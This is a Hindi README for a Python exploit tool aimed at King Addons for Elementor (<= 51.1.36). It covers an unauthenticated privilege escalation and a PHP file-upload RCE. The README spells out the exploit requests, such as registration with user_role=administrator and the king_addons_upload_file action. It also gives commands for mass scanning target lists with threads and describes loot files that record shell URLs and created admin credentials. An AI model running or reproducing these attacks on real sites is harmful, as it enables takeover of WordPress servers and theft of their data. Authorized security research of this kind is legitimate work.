
Python PoC जो King Addons for Elementor <= 51.1.36 में CVE-2025-6325 unauthenticated privilege escalation और CVE-2025-6327 arbitrary file upload RCE को validate करता है।
King Addons for Elementor <= 51.1.36 के लिए शोध और सत्यापन उपकरण, जो दो प्रलेखित कमजोरियों को कवर करता है:
केवल अधिकृत सुरक्षा परीक्षण, कमजोरी शोध, और नियंत्रित लैब वातावरण के लिए।
यह परियोजना King Addons for Elementor में दो कमजोरियों के सुरक्षा प्रभाव को मान्य करने के लिए एक दोहरे उद्देश्य वाला PoC प्रदान करती है।
King Addons पंजीकरण कार्यक्षमता के माध्यम से अनधिकृत विशेषाधिकार वृद्धि।
कमजोर प्रवाह एक क्लाइंट-नियंत्रित user_role मान स्वीकार करता है और इसे उचित भूमिका अनुमति-सूची लागू किए बिना WordPress उपयोगकर्ता निर्माण को पास कर देता है।
प्रभावित संस्करण: <= 51.1.36
पैच किया गया संस्करण: 51.1.37
कमजोर पंजीकरण प्रवाह उपयोग करता है:
POST /wp-admin/admin-ajax.php
action=king_addons_user_register
user_role=administrator
PoC यह भी सत्यापित करता है कि क्या बनाया गया खाता प्रमाणित हो सकता है और WordPress उपयोगकर्ता प्रशासन पृष्ठ तक पहुँच सकता है।
King Addons फ़ॉर्म बिल्डर अपलोड कार्यक्षमता के माध्यम से अनधिकृत मनमाना फ़ाइल अपलोड।
कमजोर अपलोड हैंडलर गलत तरीके से एक PHP फ़ाइल स्वीकार कर सकता है, जिसके परिणामस्वरूप वेब-सुलभ अपलोड की गई फ़ाइल और संभावित सर्वर-साइड कोड निष्पादन होता है।
प्रभावित संस्करण: <= 51.1.36
पैच किया गया संस्करण: 51.1.37
प्रासंगिक AJAX क्रिया है:
POST /wp-admin/admin-ajax.php
action=king_addons_upload_file
PoC अपलोड प्रवाह को मान्य करता है और जाँचता है कि क्या अपलोड की गई परीक्षण फ़ाइल एक सौम्य id कमांड निष्पादित कर सकती है।
स्क्रिप्ट चार ऑपरेशन मोड का समर्थन करती है:
check
privesc
upload
both
ये मोड सीधे कमांड-लाइन इंटरफ़ेस द्वारा उजागर किए जाते हैं।
Python 3 आवश्यक है।
किसी तृतीय-पक्ष Python पैकेज की आवश्यकता नहीं है।
अपना Python संस्करण जाँचें:
python3 --version
दोनों कमजोरी जाँच चलाएँ:
python3 exploit.py -u http://target.local --exploit both
एक्सप्लॉइट चरणों को चलाए बिना उजागर King Addons nonces खोजें:
python3 exploit.py -u http://target.local --exploit check
python3 exploit.py -u http://target.local --exploit privesc
python3 exploit.py -u http://target.local --exploit upload
एक लक्ष्य फ़ाइल बनाएँ:
http://target1.local
https://target2.local
http://target3.local
टिप्पणियाँ और खाली पंक्तियाँ अनदेखी की जाती हैं।
निष्क्रिय मूल्यांकन चलाएँ:
python3 exploit.py -l targets.txt --exploit check
दोनों सत्यापन चरण चलाएँ:
python3 exploit.py -l targets.txt --exploit both -t 20
अपलोड सत्यापन चलाएँ:
python3 exploit.py -l targets.txt --exploit upload -t 20
विशेषाधिकार-वृद्धि सत्यापन चलाएँ:
python3 exploit.py -l targets.txt --exploit privesc -t 20
PoC स्वचालित रूप से दो कमजोर प्रवाहों के लिए आवश्यक nonces के लिए लक्ष्य पृष्ठों को खोजती है।
डिफ़ॉल्ट क्रॉलर सेटिंग्स:
Depth : 3
Max pages : 80
Timeout : 20 seconds
Threads : 10
ये डिफ़ॉल्ट स्क्रिप्ट की CLI कॉन्फ़िगरेशन में परिभाषित हैं।
उदाहरण:
python3 exploit.py \
-l targets.txt \
--exploit both \
-t 20 \
--depth 3 \
--max-pages 80 \
--timeout 20
स्क्रिप्ट संरचित परिणामों के लिए डिफ़ॉल्ट रूप से results.tsv और सफल सत्यापन प्रविष्टियों के लिए loot.txt का उपयोग करती है।
निष्पादन के दौरान, उपकरण कई स्थितियों की रिपोर्ट करता है।
इंगित करता है कि अपलोड सत्यापन सफल रहा और परीक्षण PHP फ़ाइल ने सत्यापन अनुरोध का उत्तर दिया।
उदाहरण:
PWNED [SHELL]
इंगित करता है कि विशेषाधिकार-वृद्धि सत्यापन ने कमजोर पंजीकरण प्रवाह का उपयोग करके एक खाता बनाया।
उपकरण अतिरिक्त रूप से रिकॉर्ड करता है कि खाता WordPress उपयोगकर्ता प्रशासन पृष्ठ के विरुद्ध सत्यापित किया गया था या नहीं।
बनाया गया खाता सफलतापूर्वक प्रमाणित हुआ और WordPress उपयोगकर्ता पृष्ठ पर पुष्टि की गई।
पंजीकरण अनुरोध सफल रहा, लेकिन बाद का सत्यापन चरण परिणामी खाते की पुष्टि नहीं कर सका।
कोई सफल सत्यापन परिणाम प्राप्त नहीं हुआ।
लक्ष्य ने नेटवर्क, पार्सिंग, क्रॉलिंग, या अन्य निष्पादन त्रुटि उत्पन्न की।
संरचित परिणाम TSV के रूप में लिखे जाते हैं:
results.tsv
आउटपुट में इनके लिए फ़ील्ड शामिल हैं:
target
status
shell_url
shell_rce
priv_user
priv_pwd
priv_verified
err
यह प्रारूप परिणामों को स्प्रेडशीट में आयात करने या आगे की प्रक्रिया के लिए उपयोगी है।
सफल सत्यापन प्रविष्टियाँ अतिरिक्त रूप से यहाँ लिखी जाती हैं:
loot.txt
स्क्रिप्ट shell और विशेषाधिकार-सत्यापन परिणामों को अलग प्रविष्टियों के रूप में लिखती है।
Visitor
│
▼
Public King Addons Register Form
│
▼
Nonce discovery
│
▼
king_addons_user_register
│
▼
Client-controlled user_role
│
▼
WordPress user creation
│
▼
Privilege escalation validation
PoC विशेष रूप से पंजीकरण एंडपॉइंट पर सबमिट करता है:
user_role=administrator
Visitor
│
▼
King Addons Form Builder
│
▼
Upload nonce discovery
│
▼
king_addons_upload_file
│
▼
PHP test file upload
│
▼
Uploaded file URL
│
▼
Benign execution verification
PoC एक विशिष्ट रूप से उत्पन्न परीक्षण फ़ाइलनाम का उपयोग करती है और लौटाए गए अपलोड URL की जाँच करती है।
शोध कार्यान्वयन का परीक्षण इनके विरुद्ध किया गया:
WordPress 6.8 / 7.1
Elementor 4.2.3
King Addons 51.1.14
शोध नोट्स एक नियंत्रित लैब वातावरण में दोनों प्रवाहों के सफल सत्यापन की रिपोर्ट करते हैं, जिसमें विशेषाधिकार वृद्धि और shell निष्पादन शामिल है। संस्करण 51.1.37 के विरुद्ध एक नकारात्मक नियंत्रण का भी परीक्षण किया गया।
शोध नोट्स इंगित करते हैं कि 51.1.35 और 51.1.36 के लिए कुछ WordPress.org ZIP रिलीज़ बाद में आंशिक फिक्स के साथ पुनः टैग किए गए थे।
इसलिए कमजोर कार्यान्वयन की पुष्टि संदर्भित SVN टैग 51.1.14 का उपयोग करके की गई।
यदि शोध का पुनरुत्पादन कर रहे हैं, तो शोध द्वारा पहचाने गए सटीक लैब संस्करण और पैकेज का उपयोग करें, बजाय यह मानने के कि 51.1.35 या 51.1.36 लेबल वाले प्रत्येक पैकेज में समान कमजोर कोड है।
यह परियोजना इनके लिए है:
केवल उन सिस्टमों का परीक्षण करें जिनके लिए आपके पास स्पष्ट प्राधिकरण है।
अनुमति के बिना इस परियोजना का उपयोग तृतीय-पक्ष अवसंरचना के विरुद्ध न करें।
लेखक अनधिकृत पहुँच, दृढ़ता, डेटा चोरी, या सिस्टमों के व्यवधान को प्रोत्साहित नहीं करता।
यह सॉफ़्टवेयर सुरक्षा शोध और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
यह सुनिश्चित करना आपकी ज़िम्मेदारी है कि इस परियोजना का आपका उपयोग लागू कानूनों, विनियमों, अनुबंधों, और प्राधिकरण आवश्यकताओं का अनुपालन करता है।
लेखक और योगदानकर्ता अनधिकृत उपयोग से उत्पन्न दुरुपयोग, क्षति, सेवा व्यवधान, डेटा हानि, या अन्य परिणामों के लिए कोई ज़िम्मेदारी नहीं लेते।
JohenLastGen — JLG NETWORK
शोध और सुरक्षा टूलिंग
Telegram:
@johenlastgen
चैनल:
@jlgnetworkredirect
MIT लाइसेंस
पूर्ण लाइसेंस पाठ के लिए LICENSE देखें।
| विकल्प | विवरण |
|---|
-u, --url | एकल लक्ष्य URL का परीक्षण करें |
-l, --list | लक्ष्य URL वाली फ़ाइल |
-e, --exploit | check, privesc, upload, या both चुनें |
-t, --threads | समवर्ती वर्कर की संख्या |
--depth | अधिकतम क्रॉलर लिंक गहराई |
--max-pages | प्रति लक्ष्य अधिकतम क्रॉल किए गए पृष्ठ |
--timeout | सेकंड में HTTP अनुरोध टाइमआउट |
-o, --output | TSV परिणाम आउटपुट |
--loot | सफल सत्यापन आउटपुट |
--no-color | टर्मिनल रंग अक्षम करें |